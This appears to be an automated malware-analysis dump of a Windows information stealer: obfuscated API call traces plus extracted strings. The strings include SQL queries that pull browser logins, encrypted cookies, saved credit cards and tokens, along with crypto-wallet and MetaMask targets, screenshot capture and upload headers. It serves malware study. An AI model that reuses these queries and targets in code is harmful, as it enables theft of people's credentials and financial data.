GetLastError.KERNEL32 ref: 00405B2E
CloseHandle.KERNEL32(00000000), ref: 00405B35
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLz9za5ea8), ref: 00405B5A
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405B60
SetEnvironmentVariableA.KERNEL32(krdqzy7f,q7t7v6a8), ref: 00405B70
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_83ghue7f), ref: 00405B89
SetEvent.KERNEL32(00000000), ref: 00405B92
ResetEvent.KERNEL32(00000000), ref: 00405B99
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_8yh5ft3y), ref: 00405BB4
RegOpenKeyExA.KERNEL32(80000001,regfwav6hjm,00000000,00020019,?), ref: 00405BCD
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405BD8
GetLastError.KERNEL32 ref: 00405BE8
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000852,00000000), ref: 00405C06
CloseHandle.KERNEL32(00000000), ref: 00405C0D
SetEnvironmentVariableA.KERNEL32(288qh91m,m6wsuix9), ref: 00405C1D
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_bhdojfck), ref: 00405C36
SetEvent.KERNEL32(00000000), ref: 00405C3F
ResetEvent.KERNEL32(00000000), ref: 00405C46
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000630,00000000), ref: 00405C64
CloseHandle.KERNEL32(00000000), ref: 00405C6B
SetEnvironmentVariableA.KERNEL32(7mhzuiqy,jyawzxle), ref: 00405C88
CreateSemaphoreA.KERNEL32(00000006,00000006,00000001,XMLdav1qxqb), ref: 00405CB0
ReleaseSemaphore.KERNEL32(00000000,00000001,00000006), ref: 00405CB6
RegOpenKeyExA.KERNEL32(80000001,regjwczwiv1,00000006,00020019,?), ref: 00405CD0
CreateEventA.KERNEL32(00000006,00000001,00000006,ev_4yh9mboq), ref: 00405CE9
SetEvent.KERNEL32(00000000), ref: 00405CF2
ResetEvent.KERNEL32(00000000), ref: 00405CF9
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLvl2yucl5), ref: 00405D14
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405D1A
OutputDebugStringA.KERNEL32(tk49ljafb), ref: 00405D25
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_jfnhvoos), ref: 00405D3A
OutputDebugStringA.KERNEL32(txmwu9rge), ref: 00405D43
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405D4A
GetLastError.KERNEL32 ref: 00405D64
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_2tpf3k9u), ref: 00405D7D
SetEnvironmentVariableA.KERNEL32(vqbq3kvg,u6m5ltiw), ref: 00405D8F
CancelWaitableTimer.KERNEL32(00000000), ref: 00405D9A
RegOpenKeyExA.ADVAPI32(80000001,reg4t533bzq,00000000,00020019,?), ref: 00405DB7
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00001180,00000000), ref: 00405DD5
SetEnvironmentVariableA.KERNEL32(nser2o02,ynm9y2h9), ref: 00405DE7
FindCloseChangeNotification.KERNEL32(00000000), ref: 00405DEE
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000654,00000000), ref: 00405E0C
GetLastError.KERNEL32 ref: 00405E14
CloseHandle.KERNEL32(00000000), ref: 00405E1B
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_jbdif3fc), ref: 00405E36
SetEnvironmentVariableA.KERNEL32(c82yqntn,vgko7r23), ref: 00405E44
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00405E4F
FindFirstFileA.KERNEL32(s_34kdzx3i,?), ref: 00405E6B
FindClose.KERNEL32(00000000), ref: 00405E72
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000011FB,00000000), ref: 00405E90
CloseHandle.KERNEL32(00000000), ref: 00405E97
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_1b5rxocf), ref: 00405EAB
GetLastError.KERNEL32 ref: 00405EB7
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ywqblgmo), ref: 00405ED0
CancelWaitableTimer.KERNEL32(00000000), ref: 00405ED7
SetEnvironmentVariableA.KERNEL32(pd3ssdbv,ap1varzm), ref: 00405EE7
OutputDebugStringA.KERNEL32(tov5q26c7), ref: 00405EFF
FindFirstFileA.KERNEL32(s_lbbp44mn,?), ref: 00405F1C
FindClose.KERNEL32(00000000), ref: 00405F23
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000C0A,00000000), ref: 00405F41
OutputDebugStringA.KERNEL32(t00dnerjm), ref: 00405F4E
CloseHandle.KERNEL32(00000000), ref: 00405F51
OutputDebugStringA.KERNEL32(tz5kl8u5q), ref: 00405F66
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_9cfo1p3l), ref: 00405F7D
SetEvent.KERNEL32(00000000), ref: 00405F86
ResetEvent.KERNEL32(00000000), ref: 00405F8D
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_tes47dmi), ref: 00405FA7
CancelWaitableTimer.KERNEL32(00000000), ref: 00405FB2
OutputDebugStringA.KERNEL32(tqpd21biq), ref: 00405FBD
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLt0k88dpd), ref: 00405FD2
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000674,00000000), ref: 00405FEA
OutputDebugStringA.KERNEL32(tp9vj0b43), ref: 00405FF7
FindCloseChangeNotification.KERNEL32(00000000), ref: 00405FFA
LocalAlloc.KERNEL32(00000000,00000906), ref: 00406011
SetEnvironmentVariableA.KERNEL32(p6xpux7o,gqnuu3oi), ref: 00406023
LocalFree.KERNEL32(00000000), ref: 0040602A
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XML0vwx5qqa), ref: 00406045
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040604B
LocalAlloc.KERNEL32(00000000,00000D50), ref: 0040605D
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000000C6,00000000), ref: 00406077
CloseHandle.KERNEL32(00000000), ref: 0040607E
LocalAlloc.KERNEL32(00000000,00000379), ref: 0040608B
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_65h3azn8), ref: 004060A2
SetEnvironmentVariableA.KERNEL32(q61o789w,c6qmvpwn), ref: 004060B0
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004060BB
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_5k43o4b3), ref: 004060D6
SetEvent.KERNEL32(00000000), ref: 004060DF
ResetEvent.KERNEL32(00000000), ref: 004060E6
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLlr84ct8q), ref: 00406101
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 00406107
OutputDebugStringA.KERNEL32(tm7gm98q4), ref: 00406115
CreateWaitableTimerA.KERNEL32(00000004,00000001,WTMR_3ulozhve), ref: 0040612E
GetLastError.KERNEL32 ref: 00406136
CancelWaitableTimer.KERNEL32(00000000), ref: 00406141
SetEnvironmentVariableA.KERNEL32(6okdm1tu,3ctj9t2x), ref: 00406151
LocalAlloc.KERNEL32(00000000,000005B0), ref: 00406168
OutputDebugStringA.KERNEL32(tiklkzfzv), ref: 00406175
LocalFree.KERNEL32(00000000), ref: 00406178
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_efiowg0u), ref: 00406191
OutputDebugStringA.KERNEL32(tb5ozaklm), ref: 0040619E
CancelWaitableTimer.KERNEL32(00000000), ref: 004061A1
LocalAlloc.KERNEL32(00000000,000001ED), ref: 004061B9
LocalFree.KERNEL32(00000000), ref: 004061C0
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLqrpms3fl), ref: 004061D9
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004061DF
FindFirstFileA.KERNEL32(t0yhzp32e), ref: 004061EA
FindFirstFileA.KERNEL32(s_nxlib5zf,?), ref: 00406208
FindClose.KERNEL32(00000000), ref: 0040620B
FindFirstFileA.KERNEL32(s_aor9vzq7,?), ref: 00406227
FindClose.KERNEL32(00000000), ref: 0040622A
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_tk2vs67b), ref: 00406245
SetEvent.KERNEL32(00000000), ref: 0040624E
ResetEvent.KERNEL32(00000000), ref: 00406255
LocalAlloc.KERNEL32(00000000,00000415), ref: 0040626C
RegOpenKeyExA.KERNEL32(80000001,reg48zflry0,00000000,00020019,?), ref: 00406289
LocalFree.KERNEL32(00000000), ref: 00406290
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000685,00000000), ref: 004062AE
SetEnvironmentVariableA.KERNEL32(09eaw99e,9r1zhjkf), ref: 004062C0
CloseHandle.KERNEL32(00000000), ref: 004062C7
OutputDebugStringA.KERNEL32(ti9nukpkj), ref: 004062DF
CreateSemaphoreA.KERNEL32(00000004,00000004,00000001,XMLayaqc7kz), ref: 004062F9
ReleaseSemaphore.KERNEL32(00000000,00000001,00000004), ref: 004062FF
OutputDebugStringA.KERNEL32(trirngqb4), ref: 0040630A
FindFirstFileA.KERNEL32(s_3y8eqp1f,?), ref: 00406322
FindClose.KERNEL32(00000000), ref: 00406329
CreateWaitableTimerA.KERNEL32(00000004,00000001,WTMR_rnsjk8ck), ref: 00406347
OutputDebugStringA.KERNEL32(txko6u6fs), ref: 00406351
CancelWaitableTimer.KERNEL32(?), ref: 0040635B
CreateMutexA.KERNEL32(00000000,00000000,MTXy9bs4nx7), ref: 00406374
GetLastError.KERNEL32 ref: 00406381
ReleaseMutex.KERNEL32(?), ref: 0040638A
OutputDebugStringA.KERNEL32(tci9y5j5y), ref: 00406395
RegOpenKeyExA.ADVAPI32(80000001,regthvs75y8,00000000,00020019,?), ref: 004063AE
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_ijgum66z), ref: 004063C7
SetEnvironmentVariableA.KERNEL32(srjxnyfw,ly2md7as), ref: 004063D6
CancelWaitableTimer.KERNEL32(?), ref: 004063E4
OutputDebugStringA.KERNEL32(trxhpga6b), ref: 004063EF
SetEnvironmentVariableA.KERNEL32(xjzuu3oe,qr8khxdr), ref: 004063FD
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_9u1av0rn), ref: 00406416
GetLastError.KERNEL32 ref: 0040641B
CancelWaitableTimer.KERNEL32(?), ref: 00406429
GetLastError.KERNEL32 ref: 0040642F
OutputDebugStringA.KERNEL32(tzsphikyt), ref: 0040643C
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_7eoqtgja), ref: 00406451
OutputDebugStringA.KERNEL32(ta3z71hy7), ref: 0040645A
CancelWaitableTimer.KERNEL32(00000000), ref: 0040645D
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,000009EE,00000000), ref: 0040647B
FindCloseChangeNotification.KERNEL32(00000000), ref: 00406482
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_024nomth), ref: 00406496
CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLyeif1yte), ref: 004064AD
ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 004064B5
GetLastError.KERNEL32 ref: 004064BB
CreateMutexA.KERNEL32(00000000,00000000,MTX39bzbsag), ref: 004064D2
ReleaseMutex.KERNEL32(00000000), ref: 004064DD
RegOpenKeyExA.KERNEL32(80000001,regec2n4lmn,00000000,00020019,?), ref: 004064F7

Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_t2lry32w), ref: 0040ED9D
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EDA4
Part of subcall function 0040ED79: CreateMutexA.KERNEL32(00000000,00000000,MTX9of20kmn), ref: 0040EDB1
Part of subcall function 0040ED79: OutputDebugStringA.KERNELBASE(t6xplss11), ref: 0040EDCE
Part of subcall function 0040ED79: ReleaseMutex.KERNEL32(00000000), ref: 0040EDD1
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regp7r1ymid,00000000,00020019,?), ref: 0040EDED
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,SMPHR_7pn5tvkk), ref: 0040EE0A
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE14
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regd0052drm,00000000,00020019,?), ref: 0040EE32
Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,00000914), ref: 0040EE3A
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regou0dc9en,00000000,00020019,00409D4B), ref: 0040EE57
Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EE5A
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLk6eld4rr), ref: 0040EE6B
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EE75
Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_gc0upe3h), ref: 0040EE84
Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EE8D
Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EE94
Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_mn0c9pqk), ref: 0040EEA3
Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EEAB

Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(taidzcf8e), ref: 0040EDF6
Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(te82qlpx1), ref: 0040EDFD
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EEB6
Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(t4mysaur5), ref: 0040EEC8
Part of subcall function 0040ED79: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 0040EEF1
Part of subcall function 0040ED79: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00000260,00000000), ref: 0040EF03
Part of subcall function 0040ED79: GetLastError.KERNEL32 ref: 0040EF0B
Part of subcall function 0040ED79: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040EF12
Part of subcall function 0040ED79: FindFirstFileA.KERNEL32(s_78akpirh,?), ref: 0040EF24
Part of subcall function 0040ED79: FindClose.KERNEL32(00000000), ref: 0040EF2B
Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_c33ulp1b), ref: 0040EF3A
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF45
Part of subcall function 0040ED79: RegOpenKeyExA.KERNEL32(80000001,regnnoidgbh,00000000,00020019,?), ref: 0040EF60
Part of subcall function 0040ED79: CreateEventA.KERNEL32(00000000,00000001,00000000,ev_5ur9xojv), ref: 0040EF6D
Part of subcall function 0040ED79: SetEvent.KERNEL32(00000000), ref: 0040EF76
Part of subcall function 0040ED79: ResetEvent.KERNEL32(00000000), ref: 0040EF7D
Part of subcall function 0040ED79: CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_28kapc83), ref: 0040EF8B
Part of subcall function 0040ED79: CancelWaitableTimer.KERNEL32(00000000), ref: 0040EF92
Part of subcall function 0040ED79: CreateSemaphoreA.KERNEL32(00000000,00000000,00000001,XMLhgc16pbm), ref: 0040EFA1
Part of subcall function 0040ED79: ReleaseSemaphore.KERNEL32(00000000,00000001,00000000), ref: 0040EFAB
Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(tih43o6yt), ref: 0040EFB6
Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(tdcs470r4), ref: 0040EFC0
Part of subcall function 0040ED79: LocalAlloc.KERNEL32(00000000,000000F1), ref: 0040EFCD
Part of subcall function 0040ED79: SetEnvironmentVariableA.KERNEL32(8hhspfe7,y8ldbn1v), ref: 0040EFE5
Part of subcall function 0040ED79: LocalFree.KERNEL32(00000000), ref: 0040EFE8

Part of subcall function 0040ED79: OutputDebugStringA.KERNEL32(t4xlw2t0n), ref: 0040EFF3
Part of subcall function 0040ED79: SetEnvironmentVariableA.KERNEL32(68l1qnot,pk835cg2), ref: 0040EFFF

SetEnvironmentVariableA.KERNEL32(dwl78fay,z8zbvgpl), ref: 00406509
OutputDebugStringA.KERNEL32(tvkat4fjq), ref: 00406514
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000004,00000000,00001114,00000000), ref: 0040652C
CloseHandle.KERNEL32(00000000), ref: 00406533
SetEnvironmentVariableA.KERNEL32(kq2xlkz9,cb2ooln2), ref: 00406543
CreateWaitableTimerA.KERNEL32(00000000,00000001,WTMR_zxk5sggz), ref: 0040655B
CancelWaitableTimer.KERNEL32(00000000), ref: 0040655E
CreateEventA.KERNEL32(00000000,00000001,00000000,ev_jddhpv9y), ref: 0040656D

Strings

WTMR_ijgum66z, xrefs: 004063B4
regec2n4lmn, xrefs: 004064ED
jneak3tj, xrefs: 004055D6
ev_2yigbh0u, xrefs: 004059A5
#A, xrefs: 00406998
MTXqtzx8hp7, xrefs: 00404C18
XML796zf9ly, xrefs: 004059CE
tixn00umv, xrefs: 00404F69
tqpd21biq, xrefs: 00405FB8
(#A, xrefs: 00406938
reggwktxg2i, xrefs: 00405308
SMPHR_5rwhgvw3, xrefs: 004052DA
s_0rhtpalp, xrefs: 004057B8
tz5kl8u5q, xrefs: 00405F57
XMLea771d1v, xrefs: 0040549C
wallet.dat, xrefs: 00406465
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004053F9
dwl78fay, xrefs: 00406504
tzsphikyt, xrefs: 00406437
regnw0xpzk8, xrefs: 0040518F
evp5wksa, xrefs: 0040508A
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00406298
GET, xrefs: 004058FE
WTMR_upnz1jee, xrefs: 0040504A
WTMR_3ulozhve, xrefs: 0040611C
POST, xrefs: 00405937
sqlite3_column_bytes16, xrefs: 004055EF
vgko7r23, xrefs: 00405E38
WTMR_zxk5sggz, xrefs: 00406549
DisplayName, xrefs: 004062CF
t811wbm0h, xrefs: 00405063
tlsubx3d4, xrefs: 004058C2
&configId=, xrefs: 0040580C
ev_tc91xtzg, xrefs: 00404CBE
tci9y5j5y, xrefs: 00406390
ajncq7cv, xrefs: 00404FD6
c6qmvpwn, xrefs: 004060A4
MTX34s52bf3, xrefs: 00405803
WTMR_biq7qqp8, xrefs: 00404F89
tsv0hbria, xrefs: 00404D83
regon8lhjmk, xrefs: 00405567
","httpRealm":, xrefs: 00405EAD
MTX39bzbsag, xrefs: 004064C1
iaat1l8d, xrefs: 00404D91
6pms62xl, xrefs: 004051CA
8ch0b0dd, xrefs: 00405085
TRUE, xrefs: 004061CF
GdipGetImageEncoders, xrefs: 00405A7D
SOFTWARE\Microsoft\Cryptography, xrefs: 00406262
*/*, xrefs: 00405155
cookies.sqlite, xrefs: 004057AD
pera , xrefs: 004056BF
image/jpeg, xrefs: 00405995
"encrypted_key":", xrefs: 00405832
explorer.exe, xrefs: 0040623B
ev_bhdojfck, xrefs: 00405C23
- RAM: %d MB, xrefs: 00404D43
ACCOUNT:%s|TOKEN:%s, xrefs: 00405D08
encryptedUsername":", xrefs: 00405EC6
5lg5ej3x, xrefs: 00405A32
t177nyisu, xrefs: 00405A19
regh57c5y01, xrefs: 004053DB
tw931ljur, xrefs: 00405A95
tb5ozaklm, xrefs: 00406197
bilwyweo, xrefs: 004050CF
tgwabdohg, xrefs: 004058E0
\cookies.txt, xrefs: 004050A5
s_zlpk6fi9, xrefs: 00404CB0
sqlite3_prepare_v2, xrefs: 004054DD
t)A, xrefs: 00406B3C
txko6u6fs, xrefs: 00406349
WTMR_yjyspzjz, xrefs: 00405A01
P!A, xrefs: 004068A8
xjzuu3oe, xrefs: 004063F8
WTMR_g0k9fdn1, xrefs: 00405445
regjwczwiv1, xrefs: 00405CC6
t374uhtn, xrefs: 0040502F
reg77ah2op2, xrefs: 00405202
- Locale: %s, xrefs: 00404CF4
ny8b8dyz, xrefs: 00404FDB
288qh91m, xrefs: 00405C18
3ctj9t2x, xrefs: 00406147
SELECT origin_url, username_value, password_value FROM logins, xrefs: 00405641
ev_4yh9mboq, xrefs: 00405CD6
t60xwhd9g, xrefs: 004056CF
","guid":, xrefs: 00405F0C
ti9nukpkj, xrefs: 004062DA
Low, xrefs: 0040596B
8"A, xrefs: 004068D8
XMLit26gd8c, xrefs: 00405827
Stable, xrefs: 004056E8
z8zbvgpl, xrefs: 004064FF
MTXa8cu8u0k, xrefs: 0040540A
WTMR_7eoqtgja, xrefs: 0040643E
xtntns_, xrefs: 00406098
regbssywy3j, xrefs: 00405525
XMLvl2yucl5, xrefs: 00405CFF
XMLlr84ct8q, xrefs: 004060EC
q61o789w, xrefs: 004060A9
87039vfe, xrefs: 00404EB5
09eaw99e, xrefs: 004062B9
9r1zhjkf, xrefs: 004062B4
FALSE, xrefs: 004061FE
tntjlvy28, xrefs: 00405495
MTXj7l6ka3u, xrefs: 004058F7
SELECT name_on_card, card_number_encrypted, expiration_month, expiration_year FROM credit_cards, xrefs: 00405C4E
ap1varzm, xrefs: 00405EDD
Content-Type: text/plain;, xrefs: 0040521D
- CPU: %s (%d cores), xrefs: 00404E43
ProductName, xrefs: 0040544E
MTXfk5pbuec, xrefs: 00404F20
\ffcookies.txt, xrefs: 0040633D
ty46st8d5, xrefs: 00404F7D
|"A, xrefs: 004068F8
<!A, xrefs: 00406898
WTMR_08qed3dz, xrefs: 00405760
GdiPlus.dll, xrefs: 004059AE
t0yhzp32e, xrefs: 004061E5
WTMR_bn76k1pi, xrefs: 00404E87
MTXdjgl1lda, xrefs: 00404FA4
tov5q26c7, xrefs: 00405EFA
GdipGetImageEncodersSize, xrefs: 00405AA2
MTXawf1ae1n, xrefs: 0040533B
regnmhit5i7, xrefs: 00405626
SMPHR_65h3azn8, xrefs: 0040608D
User Data, xrefs: 00405249
URL:%sUSR:%sPASS:%s, xrefs: 00404CA5
- Architecture: x%d, xrefs: 00404E04
\passwords.txt, xrefs: 004050B3
storage\default, xrefs: 004060F5
trirngqb4, xrefs: 00406305
\AccountTokens.txt, xrefs: 00406579
- OS: %s, xrefs: 00404D1B
(,A, xrefs: 00406C92
|#A, xrefs: 00406948
ev_mf0tns34, xrefs: 00405A49
Gdi32.dll, xrefs: 004059D7
P,A, xrefs: 00406CC2
s_bcfre8zh, xrefs: 00404C00
%d) %s, xrefs: 00404CC9
Default, xrefs: 00406007
,%A, xrefs: 00406A0A
WTMR_0n85vc3v, xrefs: 00404DD7
tht6hiwda, xrefs: 004055FB
reg9vp9wahe, xrefs: 0040512F
---, xrefs: 004050EE
s_fh9hh7uu, xrefs: 00405329
NSS_Shutdown, xrefs: 00405D5A
p$A, xrefs: 004069C8
WTMR_tkqhivt6, xrefs: 00404DFB
WTMR_8q2mlbb1, xrefs: 00405983
sqlite3_close, xrefs: 00405508
regfaerruq6, xrefs: 00405925
\autofill.txt, xrefs: 0040508F
XMLrxdfmajw, xrefs: 00405962
ev_5k43o4b3, xrefs: 004060C1
tspltdjl, xrefs: 00405230
ev_tk2vs67b, xrefs: 00406230
sqlite3_open16, xrefs: 004054FE
ev_1yp16plg, xrefs: 00405ACC
\CC.txt, xrefs: 00405D30
t8mzisows, xrefs: 0040545E
Network\Cookies, xrefs: 00405CA6
MTXq1n7w3bt, xrefs: 00404B7B
qvmmqy34, xrefs: 00405435
s_lbbp44mn, xrefs: 00405F17
Profiles, xrefs: 00405F2B
\-A, xrefs: 00406D22
\+A, xrefs: 00406C42
y0t5yda9, xrefs: 004055DB
tl1wdo764, xrefs: 00404E80
DisplayVersion, xrefs: 004062EF
L(A, xrefs: 00406AC4
stats_version":", xrefs: 00405859
tqmqpycwx, xrefs: 004055CF
WTMR_rnsjk8ck, xrefs: 0040632F
nser2o02, xrefs: 00405DE0
ev_vo68bl08, xrefs: 00405AE7
.sqlite, xrefs: 00406187
<)A, xrefs: 00406B21
t1f98jrxw, xrefs: 0040573C
.dll, xrefs: 004064A3
PK11_FreeSlot, xrefs: 00405DBF
fz8ld49v, xrefs: 0040509B
q7t7v6a8, xrefs: 00405B66
ev_mkv5p20y, xrefs: 0040557E
XMLayaqc7kz, xrefs: 004062E6
GdipCreateBitmapFromHBITMAP, xrefs: 00405ADB
SMPHR_7zytb0ri, xrefs: 00405636
s_nxlib5zf, xrefs: 004061F9
SMPHR_942zrjhx, xrefs: 004056DF
WTMR_tes47dmi, xrefs: 00405F93
XMLdv4yvvx2, xrefs: 00405A74
hr1ql1ui, xrefs: 00404EB0
MTX1foxa753, xrefs: 0040500B
SMPHR_d0ezvgky, xrefs: 004055E6
regkukujc1n, xrefs: 004054C6
reg4t533bzq, xrefs: 00405DAD
s_b2q4tb82, xrefs: 004050F9
sstmnfo_, xrefs: 00405342
GdipDisposeImage, xrefs: 00405A54
WTMR_kzkrrc42, xrefs: 00404ED0
SMPHR_c6rtxn2e, xrefs: 0040510B
SMPHR_jbdif3fc, xrefs: 00405E21
WTMR_9u1av0rn, xrefs: 00406403
vq8nojgl, xrefs: 00404DB6
grbr_, xrefs: 00404C21
regiepztbw6, xrefs: 00405378
SMPHR_jfnhvoos, xrefs: 00405D27
jyawzxle, xrefs: 00405C7E
SECITEM_FreeItem, xrefs: 00405E5B
t8x0ufnff, xrefs: 00404EE5
SMPHR_hkoaqvuo, xrefs: 0040527B
tiklkzfzv, xrefs: 0040616E
tgnaptnne, xrefs: 00405427
regpnezg2ar, xrefs: 00404E21
XMLt0k88dpd, xrefs: 00405FBF
XMLyoo3iq38, xrefs: 00405472
SELECT host, path, isSecure, expiry, name, value FROM moz_cookies, xrefs: 0040570B
WTMR_rv9lsjh5, xrefs: 004057CA
,)A, xrefs: 00406B11
tk49ljafb, xrefs: 00405D20
PK11_GetInternalKeySlot, xrefs: 00405D73
trxhpga6b, xrefs: 004063EA
|-A, xrefs: 00406D32
wallets, xrefs: 00405284
reg48zflry0, xrefs: 0040627F
srjxnyfw, xrefs: 004063CE
*A, xrefs: 00406BA7
H*A, xrefs: 00406BBC
i32zb19a, xrefs: 0040543A
PATH, xrefs: 00405411
SMPHR_8yh5ft3y, xrefs: 00405B9F
6okdm1tu, xrefs: 0040614C
WTMR_2tpf3k9u, xrefs: 00405D6A
L)A, xrefs: 00406B31
tvkat4fjq, xrefs: 0040650F
SELECT service, encrypted_token FROM token_service, xrefs: 00405C73
MTXeuk0bqyk, xrefs: 0040514C
formhistory.sqlite, xrefs: 00404E90
Content-Disposition: form-data; name="file"; filename=", xrefs: 004058D4
sgnl_, xrefs: 00404B94
dscrd_, xrefs: 00404C64
SELECT host_key, path, is_secure , expires_utc, name, encrypted_value FROM cookies, xrefs: 00405686
c82yqntn, xrefs: 00405E3D
SetStretchBltMode, xrefs: 00405BF0
ews_, xrefs: 00404C05
tlgrm_, xrefs: 00404BD3
NUM:%sHOLDER:%sEXP:%s/%s, xrefs: 00405CDF
MTX659bq5ml, xrefs: 004055A9
WTMR_ywqblgmo, xrefs: 00405EBD
sqlite3.dll, xrefs: 004053B6
L'A, xrefs: 00406A6D
SMPHR_jttod3t8, xrefs: 004051D5
"webextension@metamask.io":", xrefs: 004061AE
XMLqrpms3fl, xrefs: 004061C6
prefs.js, xrefs: 004060CC
XMLyeif1yte, xrefs: 00406498
ldop5nfk, xrefs: 00405720
- Display size: %dx%d, xrefs: 00404DAA
GdiplusStartup, xrefs: 00405A09
WTMR_l9vi7zsm, xrefs: 0040501A
gqnuu3oi, xrefs: 00406017
wlts_, xrefs: 004052A8
kq2xlkz9, xrefs: 0040653E
scrnsht_, xrefs: 0040531E
Login Data, xrefs: 004054A7
s_34kdzx3i, xrefs: 00405E66
ouljkvyw, xrefs: 00405235
tkcq1j60r, xrefs: 004057FC
cb2ooln2, xrefs: 00406539
regcybb0am7, xrefs: 0040589E
ro27ovri, xrefs: 00405A2D
m6wsuix9, xrefs: 00405C13
Local State, xrefs: 004063BD
sqlite3_column_blob, xrefs: 00405614
SMPHR_llytb8bk, xrefs: 004058C9
regiwldu3lh, xrefs: 00404C49
XMLz9za5ea8, xrefs: 00405B3B
tzuizwazx, xrefs: 00404EA0
l(A, xrefs: 00406ACF
token:, xrefs: 0040534C
tm7gm98q4, xrefs: 00406110
Cookies, xrefs: 00405C9C
extensions, xrefs: 00406061
Web Data, xrefs: 0040547B
ly2md7as, xrefs: 004063C9
Profile %d, xrefs: 00406039
ev_h08jrwbj, xrefs: 00404BC8
gi25app2, xrefs: 004051C5
sqlite3_column_text16, xrefs: 004055B0
SMPHR_bbz60kxw, xrefs: 00404C59
regjj3pi0uk, xrefs: 0040594D
","encryptedPassword":", xrefs: 00405EEF
Content-Type: application/x-object, xrefs: 0040587D
tp9vj0b43, xrefs: 00405FF0
c6nxfun9, xrefs: 00404DBB
%sTRUE%s%s%s%s%s, xrefs: 00404C83
krdqzy7f, xrefs: 00405B6B
p6xpux7o, xrefs: 0040601C
4yz9begi, xrefs: 00404D8C
DeleteObject, xrefs: 00405B7F
txmwu9rge, xrefs: 00405D3C
%s %s, xrefs: 00406312
libs, xrefs: 004064C8
SMPHR_ahhs9tdw, xrefs: 00404E38
MTXrulvz4cj, xrefs: 00405876
XMLfg0ub50n, xrefs: 0040567B
XMLu4fdevhq, xrefs: 00404B62
S-1-5-18, xrefs: 00405F9C
XMLx4yqw1al, xrefs: 00405212
